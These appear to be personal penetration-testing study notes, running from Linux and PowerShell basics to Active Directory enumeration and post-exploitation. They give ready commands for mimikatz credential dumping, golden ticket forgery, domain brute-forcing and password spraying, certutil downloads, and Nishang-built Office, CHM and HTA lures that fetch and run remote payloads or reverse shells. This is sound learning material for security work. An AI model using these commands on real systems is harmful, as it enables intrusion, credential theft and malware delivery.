LINUX COMMAND LINE
- User the --help or --h to get help
- List directory items with permissions with ls -al. Permissions listed in order of owner - group - 'everyone else'
- Commands - mkdir(make direcroty), mv file new_name(rename file), cp file new_copy (make copy of file) rm file/directory (remove a file or directory), rm -r directory (permanently remove a directory) - Change permissions on file or directory with chmod
- Create new file with touch
- Edit files with nano or vim
- Command wc counts the number of lines, words, characters/ bytes in a file. Syntax; wc file_name
- Command "tr [a] [b] < file > new_file". Replaces all instances of 'a' with 'b' in the file 'file' and puts output in new file 'new_file'
- Command "sed 's/word/new_word/g' filename". Replaces all instances of 'word' with 'new_word' in the file 'filename'
- Command sudo . Runs a command as root
- Command "sudo -u username command". Runs the command 'command' as the user 'username'
- Command su . Switches to root user - Command "su username" . Switches to the user account 'username'
- Command "ssh username@10.10.10.10 .Creates secure ssh connection as user 'username' with password based authentication
- Command "ssh -i path-to-private-key username@system(or ip-address) . Connects to system as username using public key authentication.
- Command "scp path-to-localfile user@system(or ip-address) . Copies file to romote location specified via secure connection. Scp runs on port 22 (ssh port). To copy from remote system to local system, reverse the path-to-localfile and user@system
- If ssh on the reomte system is listening on a port which is not the default of 22 then you specify using the -P argument:
- Scp -P 2332 file.txt remote_username:10.10.100.23:/remote/directory/new_file_name.txt
Specifying the filename changes the name of the file when it is transferred, without which the file name will be the same as the original file being transferred. - Command "find /directory filename" . Searches the directory '/directory' for file 'filename'. Also capable of searching for files belonging to a particular user, files with specific file permissions and files containing a particular character or string in their names. Command "find . Filename" Searches for file 'Filename' in the current directory. To search in all directories use /
- Sort output of file or command using sort
- Command "md5sum filename" generates the md5 hash of file 'filename' . Generate sha1sum and sha256sum for sha1 and sha256 hash values.
- Use more command to read files on command line on windows. Linux equivalent is cat
- Ping command needs the -c flag to determine the number of requests and responses to both send and receive. (Windows -n)
- Traceroute usually sends 3 packets. - Start listening server on port 9999 : nc -nvlp 9999
- Connect to listenning server on port 9999: nc "server-ip-address" 9999
- Passive reconnaissance using nslookup: nslookup -type=MX tryhackme.com . Usually similar to dig command as well.
- Discovering hosts in the same subnet would require ARP queries. - Using nmap to scan ip addresses through a list: nmap -iL list.txt
- To view the list of ip addresses nmap will scan without scanning them: nmap -sL TARGETS. Would also try to DNS resolve the ip addresses. | - Command wc returns number of lines, words, characters, then filename
- Command to find live hosts without scanning the targets: nmap -sn TARGETS. (ping scan)
- Command to perfor ARP scan without port scanning: nmap -PR -sn TARGETS. The -PR option indicates you want ARP scan. This will find all the live hosts on the subnet without port scanning. - Command to discover hosts by sending an Echo ping scan: nmap -PE TARGET
- The -sn flag stops nmap from following with a port scan. (nmap -PE -sn TARGET)
- Command to discover hosts by performing TCP Ping scan: nmap -PS21,80,443 -sn MACHINE/24. (Needs to be run as privileged user: [root, sudoers] in order for nmap not to perform 3 way handshake if port is open)
- Command to discover hosts by performing TCP ACK ping scan: nmap -PA21,443,67 -sn TARGET (Needs to be run as privileged user: [root, sudoers] in order for nmap not to perform 3 way handshake if port is open)
- The above tcp discovery commands should always be followed by port(s) number or - Command to discover hosts by performing UDP Ping: nmap -PU -sn TARGET
- UDP ping scan on closed port returns ICMP destination unreachable (port unreachable)
- UDP ping scan on open port returns nothing.
- Renaming a file: mv old-filename new-filename
POWERSHELL
- Every output on Powershell is an object, and can be manipulated with the pipe operator
- Use the cmdlet Get-Help to get information about a command. Eg "Get-Help Get-Command " shows help options for the command "Get-Command"
- Adding the "-Examples" to the "Get-Help Get-Command" shows different examples of how the command "Get-Command" is used. - Command "Get-Help *process" lists everything (cmdlet etc) which contains the word process
- "Get-Process | Sort-Object -Property ID" returns the processes on the PC and sorts the output objects by the ID property.
- "Set-Content", "Get-Content" and "Add-Content" allows you to create/overwrite files, read from files, and append content to an existing file respectively. "Set-Content -Value "This is a test" -Path ./test.txt" creates a file and adds the content specified to the file. This can be later read with "Get-Content"
- "Get-Module -ListAvailable" shows all available modules. - "Get-Module PSReadline -ListAvailable" shows the functions contained within the PSReadline module.
- "Import-Module -Name 'PSReadline' " imports the module using its name while "Remove-Module -Name 'PSReadline' " command will remove the module using its name.
- "Get-EventLog -list" lists the available logs while "Get-EventLog System" shows all entries for a specific log. - "Get-EventLog -LogName System -Newest 1000 | Group-Object -Property Source -noelement | Sort-Object -Property count -descending". Command gets newest 1000 System logs, groups them by Source property then sorts the objects by Property and counts them in descending order. - Check out the five different ways to bypass the Restricted policy on Powershell. - Most common aliases to be used on DoS : [Get-Content: Type], (Get-ChildItem : dir) (Copy-Item: copy), (Remove-Item: Del), (Move-Item: move)
- "Get-Aliases *d* " - This command returns all aliases which contain the letter d in between.
- "Help Set-Content -ShowWindow" : Displays the help menu in a cleaner window.
- $env variable is used to set and retrieve environment variables.
- A process queries the TEMP environment variable to find a suitable location to store temporary files. HOME or USERPROFILE environment variables are used to find the directory structure owned by the user running the process.
- Find the security/password policies for a Windows computer or server: Start -> secpol
- In order to define the context in which actions are executed in Task Scheduler metadata is stored in .job files located in the Task folder. In order to ensure persistence malware installs itself as a series of scheduled tasks. Run Task Scheduler with Start -> taskschd.msc
- Command Get-Alias lists the different aliases which have been set up
- Piping a command to more produces the output page by page.
- Command to find the parameters of a command - example Get-Command : "Get-Help Get-Command -Parameter * "
- Command to find all the Cmdlets with the word process in their names: "Get-Command -CommandType cmdlet -Name *process*"
- Cmdlets in powershell follow a verb-noun naming convention. To find the cmdlets which stop something: "Get-Command -Verb stop"
- "python -m http.server 1234" spins up a web server in the current directory on port 1234.
- $myVariable = Get-ChildItem C:\Windows | $myVar
- You could format output differently by piping output to Format commands: Get-ChildItem | Format-Table
View the different format commands: Get-Command -CommandType cmdlet -Name Format*
- Formatting output by piping to the GridView prints output in a clean independent grid view: Get-ChildItem | Format-Table
- Comparison operators used by powershell: -eq, -ne, -gt, -lt, -le, -ge, -match, -notmatch, -replace, -like, -notlike, -in, -notin, -contains, -notcontains.
- "hello world" -match "Words" returns True
- Advanced operators: -and, -or, -xor, -not, -split, -join, -is, -isnot, -as .
- "a string: $str" is not the same as 'a string: $str' - To return variable type: $str.GetType()
- $array = 1, 2, "hi", 3 . This is an array To create empty array: $array = @()
- Command to list all available modules: Get-Module -ListAvailable -All | more
- Command to view cmdlets which accept parameter of ComputerName: "Get-Command -CommandType cmdlet -ParameterName ComputerName"
- Command to return the cmdlets which can take the ComputerName and Credential parameter but not the Session parameter. "Get-Command -CommandType cmdlet | Where-Object {$_.Parameter.Keys -contains 'ComputerName' -and $_.Parameter.Keys -contains 'Credential' -and $_.Parameter.Keys -notcontains 'Session'}
- The expression $_ represents an object. See the command above
- Command to view the different members of cmdlets: "Get-Command -CommandType cmdlet | Get-Member"
- Command to test connection on multiple machines or domains: "foreach ($pc in ('domainpc', 'localhost', 'google.com')) {Test-Connection $pc}"
- Powershell remoting is based on the WSMAN protocol and uses WinRM. Operates on port 5985 for http and 5986 for https(recommended)
- For powershell remoting, the user needs admin access on the remote machine (In a trusted domain). User does not need to be the built in admin but could be part of the local admin group. Also remoting needs to be enabled on the target environment to be used. - Post Server 2012, powershell remoting is enabled by default. - If attacker machine is in workgroup or not part of the target machine's domain, you need to tell your machine to trust the target machine or network. This is because while using remoting the attacker machine sends credentials: "Set-Item WSMan:\localhost\client\trustedhosts -Value *" The wildcard trusts everyone. Remember this needs to be run from an elevated shell. - Command to view the trusted hosts for attacker machine: "Get-Item WSMan:\localhost\client\trustedhosts"
- PSSession is an interactive session in powershell.
- Command to create a new PS session on the target: "New-PSSession -ComputerName domainpc -Credential bharat\"
- Command to view available PS sessions:"Get-PSSession" (version 2) - Command to view the available PS sessions to a particular computer: "Get-PSSession -ComputerName domainpc" (version 3)
- Command to view powershell version: "$PSVersionTable"
- Command to enter a pSSession: Enter-PSSession -Id 1
- The process "wsmprovhost" always gets started on target when using powershell remoting.
- Never a good idea to leave PS sessions on a target. Use command: "Remove-PSSession"
- Also, it is difficult to execute powershell scripts easily using PSSession. Could be done using "Invoke-Command"
- Command to run commands or scripts on a remote computer and return all output: "Invoke-Command"
- Command to run a batch of commands on remote computer: "Invoke-Command -ScriptBlock {whoami; (Get-Host).Version; Get-Process} -ComputerName domainpc -Credential bharat\domain"
- Command to execute powershell script on remote machine: "Invoke-Command -FilePath C:\PFPTHelloWorld.ps1 -ComputerName domainpc -Credential bharat\domainpc". This converts the ps1 file in the path to a scriptBlock and executes it on the remote machine like in the command above this point.
- In order to execute a module remotely, it can not be done the same way as scripts. You need to import the module locally first then run from the context of a function as shown: Start by importing module "Import-Module .\Powerpreter.psm1" then run command remotely: "Invoke-Command -ScriptBlock ${function: Get-WLAN-Keys} -ComputerName domainpc -Credential bharat\domain"
- PSSessions can be used only with a single machine at a time (one-to-one) while Invoke-Command can be used to remotely execute on several machines at a time. - Execution of commands remotely via Invoke-Command is stateless. For example a value assigned to a variable cannot be used in subsequent command. In order to make it stateful, create a session and run the command on that session and the subsequent command on the same session: Create new session with New-PSSession, then assign to a variable: "$Sess = Get-PSSession". Then run the subsequent commands on that session : "Invoke-Command -ScriptBlock {$procs = Get-Process} -Session $Sess" followed by "Invoke-Command -ScriptBlock {$procs} -Session $Sess". Now you will observe you can return values of the $procs variable.
- We can implicitely execute commands on remote systems by creating a function on a PSSession then use the Import-PSSession command to create a command which will run on that Session as far as the session lives. Create function on the session: "Invoke-Command -ScriptBlock {function Get-Sysinfo {whoami; $env:Computername}} -Session $Sess" assuming the function is already created and assigned to the variable $Sess.
Explicit remoting: "Invoke-Command -ScriptBlock {Get-Sysinfo} -Session $Sess"
Using Import-Session to create the command for implicit remoting: "Import-PSSession -CommandName Get-Sysinfo -Session $Sess". Perform implicitly remoting by just running"Get-Sysinfo" command. - Exporting the above command to a module: "Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $sess"
- In order to get access to a machine which is not directly connected to our attacker machine, we need to run the following commands on the attacker machine and on the target machine which will forward credentials to the 3rd machine which we do not have direct access to. Run on attacker: Enable-WSManCredSSP -Role Client (allows delegating credentials to targets)
Run on connected target: Enable-WSManCredSSP -Role Server (allows server to accept user credentials from remote computer)
Command to view the credential delegation configuration: Get-WSManCredSSP
- Command to start a job to execute a command : "Start-Job -ScriptBlock {whoami}"
- Command to execute ps1 file via a job: "Start-Job -FilePath .\HelloWorld.ps1"
- Executing jobs remotely: "Invoke-Command -ScriptBlock {ps} -ComputerName domainpc -Credential bharat\domainuser -AsJob
Could also be done this way: "Invoke-Command -ScriptBlock {Start-Job -ScriptBlock {ps}} -ComputerName domainpc -Credential bharat\domain -AsJob
Worth noting these jobs will run statefully
- Command to view output of executed job: "Get-Job -Id 14 | Receive-Job". - WMI is Windows Management Instrumentation which is used to access management information across platforms in an enterprise. Used by admins to manage different machines in an enterprise environment. WMI contains namespaces which are a collection of classes to hold objects of different kinds.
- Command to explore namespaces: "Get-WMIObject -Namespace "root" -Class "__Namespace" To list only the names: "Get-WMIObject -Namespace "root" -Class "__Namespace | Select-Object Name"
- Exploring all the classes available in WMI: "Get-WmiObject -Namespace "root/cimv2" -List - Exploring Methods: "Get-WmiObject -Class Win32_process -List | Select-Object -ExpandProperty Methods - Command to list all the processes in Win32 Process class "Get-WmiObject -Class Win32_Process"
To execute it remotely: "Get-WmiObject -Class Win32_Process -ComputerName domainpc -Credential bharat\domain"
- To filter out the results based on the 'Name' property: "Get-WmiObject -Class Win32_Process -Filter {Name = "powershell.exe"}
Could also be done using Where-object: "Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -eq "powershell.exe" }"
Could also be done using the Query parameter: "Get-WmiObject -Query {Select * from Win32_Process where Name = "powershell.exe"} In order to stop the process, you can pipe it to the Remove-WmiObject command: "Get-WmiObject -Class Win32_Process -Filter {Name = "powershell.exe"}
- Com objects are interfaces to various windows applications. - Command to check if the registry hives have been loaded as drives: "Get-PSProvider -PSProvider Registry"
SUBDOMAIN ENUMERATION
- Three methods used for subdomain enumeration (Osint, Brute forcing and virtual host). Osint is done with the help of google hacking dorcs and checking ssl/tls certs with help of search engines. Bruteforcing is done with tools like DNS Bruteforce, Sublister.
APPLICATION BYPASS
- Usernames can be enumerated with the ffuf tool which uses a word list of commonly used usernames to check against the target website if matches exist. Ffuf could then be used for brute force attack on the confirmed usernames found.
WEB APPLICATION VULNERABILITIES
- Several web application attacks arise from vulnerabilities like Path traversal, Local File Includes (attacker includes payload in fetch url and is able to read or modify files on the target server and/or navigate through directories), Remote File Includes (attacker hosts his own server and includes path to the server in the url to the target server in order for the target server to visit, fetch and execute payload).
- Common remediation steps: keep systems/frameworks up to date, Turn off server app errors, use WAF, disable php features causing file inclusion vulnerabilities (allow_url_fopen and allow_url_include), never trust user input, implement whitelisting and blacklisting for file names and locations. Server Side Request Forgery is a vulnerability where an attacker causes the webserver to make additional HTTP requests to the resource of the attacker. Two types: regular and Blind
Read https[:]//blog.aghanim.net/?p=1120 for final challenge
POWERVIEW ENUMERATION
- NT Authority\System is a powerful account on the windows systems with unrestricted access to all local system resources. Is a member of Windows Administrators group on the local computer.
- Command to bypass execution policy before running Powerview script: Powershell -ep bypass
- Command to view information about the different users which are part of the domain: Get-NetUser.
Can be piped with other operators like the select to view specific information about the different users being enumerated:
Get-NetUser | select cn, objectsid, adspath
- Command to get the different groups in the domain: Get-NetGroup
- When trying to enumerate groups for a particular domain when there are several domains: Get-NetGroup -Domain DOMAIN-NAME.local
- Command to enumerate the groups which are administrator groups: Get-NetGroup -AdminCount
- Command to get all the groups a particular user is a member of: Get-NetGroup -UserName Admin2
- Command to get all the users that are part of a particular group: Get-NetGroupMember -GroupName "Administrators"
- Command to get all the computers which are part of the domain: Get-NetComputer
- Command to get the computers which are currently online: Get-NetComputer -Ping
- Command to get full operating system information for the computers: Get-NetComputer -FullData
Can pipe command with other operators to view specific information about the Computer:
Get-NetComputer -FullData | select cn, operatingsystem (views the different user names and their respective operating systems)
- Command to view the domain information: Get-NetDomain
Can also use : Get-NetDomainControllerr
- Commaind to view the domain SID: Get-DomainSID
- Command to view the domain policy: Get-DomainPolicy
- When a Domain Controller has been compromised, you can view the different machines you can access with administrative privileges with the following command: Find-LocalAdminAccess (Only computers which are currently online)
- Another command to view the local domain admins: Invoke-EnumerateLocalAdmin
- Command to view the different group policies: Get-NetGPO
Can be piped with other operators to view specific information: Get-NetGPO | select displayname, whencreated
- Command to enumerate users currently logged on to the domain controller: Get-NetLoggedOn
Can include option to view users currently logged on to a particular domain : Get-NetLoggedOn -ComputerName Domain-Controller.CONTROLLER.local
- Command to enumerate the last person to log on : Get-LastLoggedOn
Again, can include option to enumerate user who last logged on to a particular domain: Get-LastLoggedOn -ComputerName Domain-Controller.CONTROLLER.local
- Command to view any current RDP sessions: Get-NetRDPSession
Can include option to enumerrate sessions to a particular computer: Get-NetRDPSession -ComputerName Domain-Controller.CONTROLLER.local
- Command to find shares on the domain controller: Invoke-ShareFinder
- Once the shares are found, you can carry out operation like enumerating the contents of the shared folders. For example a share displayed as "\\Win10.mayorsec.local\C$" could be enumerated with the command "ls \\WIN10\C$" and depending on contents, we could do "ls \\WIN10\C$\\users". User needs to be authorised to view the contents. - Command to enumerate the local admins on every workstation which is domain-joined for the domain "Invoke-EnumerateLocalAdmin". Bear in mind before you are even domain admin, you must alsop be a local admin by default. - Given there is loads of ACL for a domain, it is always helpful to enumerate with filters. Example: "Get-ObjectAcl -SamAccountName "engineering" -ResolveGUIDs
If results show that a group has genericall rights over another group, for example the Sales group having these rights over Engineering, then we can add members of the Sales group to the Engineering group, Like so: "net group Engineering s.chisholm /add /domain" or even delete the user with the "/del" keyword instead of /add
BLOODHOUND ENUMERATION
- Bloodhound is the visualisation tool while Sharphound is the data collector written in C-sharp and uses Windows native functions and LDAP namespace functions to collect data from DCs and domain-joined windows systems. POST EXPLOITATION: TRANSFERING FILES TO WINDOWS TARGETS
- Certutil utility isa cmd program used to dump CA configuration information
- Use certutil with -URLcache parameter in conjunction with the -f option is used to fetch (Download a file from a remote server)
Watch out for outgoing connections being blocked when working in lab or restricted environments.
- Once files are served on server, use command: certutil -urlcache -f http://ip-or-name-of-server/file-to-download
- Winpeas (Windows Privilege Escalation Enumeration Awesome Script) identifying vulnerabilities in the Operating system (kernel) and misconfigurations which could lead to attacker elevating privileges on the local system and network eventually. - Command "whoami /priv" shows the different privileges the logged in user has on the system
- Hotfixes on windows helps identify patch levels for the system. Can give out information about different vulnerabilities the hotfixes have and what the hotfixes are patching in terms of vulnerabilities. - Windows Exploit Suggester is another tool (python script) which requires system information (systeminfo command) saved in a file in conjunction with a vulnerability database in order to provide vulnerabilities for that particular version of Windows. - Command: windows-exploit-suggester.py --database database-file.xls --systeminfo systeminfo-file.txt
POST EXPLOITATION: MANUAL ENUMERATION
- Command whoami /priv: View privileges and what we are allowed to do.
- Command to enumerate groups and view the groups the currrent user is part of: whoami /groups
- Enumerate other user accounts on the target system: net users
- To enumerate and find more information about a user found: net user Admin2
- To enumerate the groups on the system: net localgroup
- To enumerate a group which has been found: net localgroup "Remote Desktop Users"
- Display hostname: hostname
- Enumerate system information: systeminfo
- Can use the Windows Management Instrumentation tool/utility (wmic) to enumerate hotfix ids, when they were installed: wmic qfe
- Enumerating the list of services currently running: tasklist /SVC
- Enumerating network information: ipconfig /ALL
- Command to print out routing table: route print
- Enumerate the ports which are active and listening: netstat -ano - Command to identify if Windows Defender is enabled: sc query windefend
If State is set to STOPPED: it is disabled
- Enumerating if the windows firewall is active: netsh firewall show state
If Operational mode is set to Disable: it is disabled POST EXPLOITATION: MIMIKATZ
- Mimikatz requires Administrative privileges.
- Command to check privileges on mimikatz: privilege::debug
Response of 20 indicates you are running as administrator.
- Windows Server 2012 and onwards, clear text passwords and LM hashes are no longer stored in memory. On older versions the command to dump these passwords: sekurlrsa::logonpasswords
- Command to dump contents of the SAM database: lsadump::sam
- LSA stands for Local Security Authority and is used to manage the system's local security policy and stores data for user accounts like user logins, authentication of users and their user secrets. - Because LM hashes and passwords are no longer stored in memory, use lsadump command with /patch flag: lsadump::lsa /patch. - Once you get the ntlm hash, you can crack using tool hashcat and wordlist provided: hashcat -m 1000 ntlm-hash word-list.txt
- Krbtgt account is a local account used for ticket distribution during authentication. In order to create golden ticket you need krbtgt account SID, NTLM hash, SID of Admin user(500)
Command to get this information: lsadump::lsa /inject /name:krbtgt
- Command to create the golden ticket: (In order to gain cmd access to other systems in the network)
Kerberos::golden /user:(user-currently-logged-in) /domain:controller.local /sid: S-1-5-21-849420856-2351964222-986696166 /krbtgt:ntlm-hash /id:500
POST EXPLOITATION: PERSISTENCE WITH METASPLOIT
POST EXPLOITATION: WINPEAS
- Winpeas (Windows Privilege Escalation Enumeration Awesome Script) identifying vulnerabilities in the Operating system (kernel) and misconfigurations which could lead to attacker elevating privileges on the local system and network eventually.
- Command to enumerate only user information: winpeas.exe userinfo
HOST DISCOVERY
Command to list the commands available with Nishang tool: "Get-Command -Module Nishang"
-Port Scan and resolve host names with Nishang tool : "Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.20 -ResolveHost"
- Port scan with Powersploit for ping scan host discovery: "Invoke-Portscan -Host google.com -PingOnly" (Start by importing module)
- Command to list the commands available with Powersploit: "Get-Command -Module Powersploit"
- Import Posh-SecMod. Contains useful function for arpscan. - Arp scan to find machines which are available on the local network: "Invoke-ARPScan -CIDR 192.168.254.0/24"
PORT SCANNING
- Scanning ports using Nishang: "Port-Scan -StartAddress x.x.x.x -EndAddress x.x.x.x -ScanPort"
- Worth noting invoke portscan is faster than Nishang because it is multithreaded.
- Assign the above output to a variable and filter through variable ($result) to get detailed output. "$result | select-Object -ExpandProperty" filteredports"
- Enumerating SRV records on Active Directory environments using Posh-SecMod (SRV records are prt of DNS info and give information about different services, hostnames and respective ports on which these services run). "Invoke -EnumSRVRecords -Domain google.com"
- Using Posh-Shodan to check the existence of files and directories in AD environments. Start by importing Posh-Shodan. View commands available by "Get-Command -Module posh-shodan"
- API key is always passed to every command or in order to keep your key private or you can set the API key and set a master password via command "Set-ShodanAPI-key"
- Command to resolve hostname with post-shodan: "Get-ShodanDNSResolve -Hostname google.com"
- Command to check on the number of devices with the string of "default password": "Measure-ShodanHost -Query "default password" -city Mumbai "
- List the services which are available with Shodan : "Get-ShodanService" - Instead of loading an entire module you can just load a script: "..\PowerSploit\Recon\Get-HttpStatus.ps1" which would load the get-httpstatus script. Proceed by running script: "Get-HttpStatus -Target newpc -Path .\PowerSploit\Recon\Dictionaries\generic.txt -Port 80" Filter the traffic by status OK: " | Where-Object {$_.Status -match "ok" } "
- .Net framework greatly helps in increasing the functionality of powershell. - Module used for vulnerability scanning and analysis: "Posh-NVS"
- After performing the tool above to perform scanning and save the outputs to xml files, use the "Parse_Nmap" for parsing the xml results".\Parse_Nmap.ps1 -Path .\xml_output_filename -RunStatsOnly."
- To parse xml files manually: "$nmap = [xml](Get-Content .\filename)" then run the command "$nmap" to view the content. Which will show content of nmaprun. Then run command "$nmap.nmaprun | Get-Member" to view the different properties you could query to view information. Example: "$nmap.nmaprun.host.status"
BRUTE-FORCE
-In order to successfully bruteforce, attacking machine must be part of the target domain. Remember this technique bruteforces the domain controller itself, hence more noisy with higher chance of getting caught.
- Assuming you have access to a machine in the target domain, you create a PSSession and download the bruteforcing script and run it: ". \BruteForce"
- Command to bruteforce the Administrator account with password "Password1": "Brute-Force -Identity Bharat -UserName Administrator -Password Password1 -Service ActiveDirectory" - This bruteforce script could be used to get the credentials of non-Administrative users
Bruteforcing with a password wordlist: "cat .\password_wordlist.txt | Brute-Force -Identity Bharat -UserName Administrator -Service Active Directory"
To do password spraying on the text file of enumerated users: "cat .\username_wordlist.txt | Brute-Force -Identity Bharat -Password Password1 -Service ActiveDirectory)"
- Using the same script to bruteforce an sql service: "Brute-Force -Identity domainpc -Username user1 -Password password1 -Service SQL " Identity parameter and value could be replaced with "-ComputerName domainpc".
Similar syntax as above trying to bruteforce from a wordlist or implement password spraying. Remember to always store results in a variable to parse out for specific information or datasets.
- Similar service as above for brute-forcing FTP and Sharepoint
- Note using the tools "Get-WinRMPassword" and "Get-WmiPassword" does not require attacking machine to be in the same domain. Can not be used to bruteforce Administrative users. Run command "..\Get-WinRMPassword.ps1" then run "Get-WinRMPassword -ComputerName domainpc -username bharat\domainuser -wordlist ..\wordlist_name.txt -Verbose" - After bruteforcing the credentials of the mssql server running on the target machine, use the "Execute-Command-MSSQL.ps1" script. Load the script with "..\nishang\Execution\Execute-Command-MSSQL.ps1" then run "Execute-Command-MSSQL -ComputerName domainpc -Username user -Password password1". This attempts to open a powershell, sql or cmd shell on the target computer.
CLIENT SIDE ATTACKS
- Can be implemented by two tools "Out-Word" and "Out-Excel"in Nishang which generate word or excel files carrying payloads.
- Example: "Out-Excel -Payload "powershell.exe -noexit -c Get-Service"" will create a file with a malicious payload which as seen on the command here opens a powershell shell and executes the command Get-service.
- Different payloads exist: "Out-Excel -PayloadURL http[:]//192.168.0.1/speak.ps1 -Arguments "Speak 'You have been hacked' " " This command goes to the supplied url, downloads the script speak.ps1 and executes it. We do not get Macro warnings when running the above payloads because in the Out-Excel script the code disables Macro security in order to programmatically access VBA in excel files. VBA is the programming language used to automate tasks in Office suite of applications in order to create macros. According to the code of this script in order to re-enable macro security after running the payload add the "-RemainSafe parameter"
- Using the Out-CHM.ps1 script does not need to include powershell.exe in the payload because it is already part of the code in the script. Also you need HTML Help Workshop on the attack machine. - To generate a properly compressed encoded script we use "..\nishang\Utility\Invoke-Encode.ps1" then run "Invoke-Encode -Data " then run "Invoke-Encode -DataToEncode .\reverse_powershell.ps1 -OutCommand" where the value of DataToEncode is the cmd reverse powersshell from metasploit.
Once this encoded shell code is stored in a file encoded.txt we use the copied content with the Out-CHM script . "Out-CHM -Payload "-e " -HHCPath 'C:\Program Files (x86)\HTML Help Workshop encoded_shell_code '. This creates a .chm file.
- The Out-Shortcut.ps1 script has the same syntax as Out-CHM. "Out-ShortCut -PayloadURL url_of_meterpreter_reverse_shell"
- Script ..\nishang\Client\Out-HTA.ps1 generates an html application and a VB script both of which can be hosted on webserver. Link of the HTA is sent to target which gets executed once the target choses to open leads to a powershell payload or script executed on the target. "Out-HTA -PayloadURL http[:]//192.168.0.23/ps_payload64.ps1"
- Script ..\nishang\Client\Out-Java.ps1 creates a jar and an html file which loads the jar file. "Out-Java -PayloadURL http:192.168.2.12/ps_payload.ps1 -JDKPath C:\Program Files\Java\jdk1"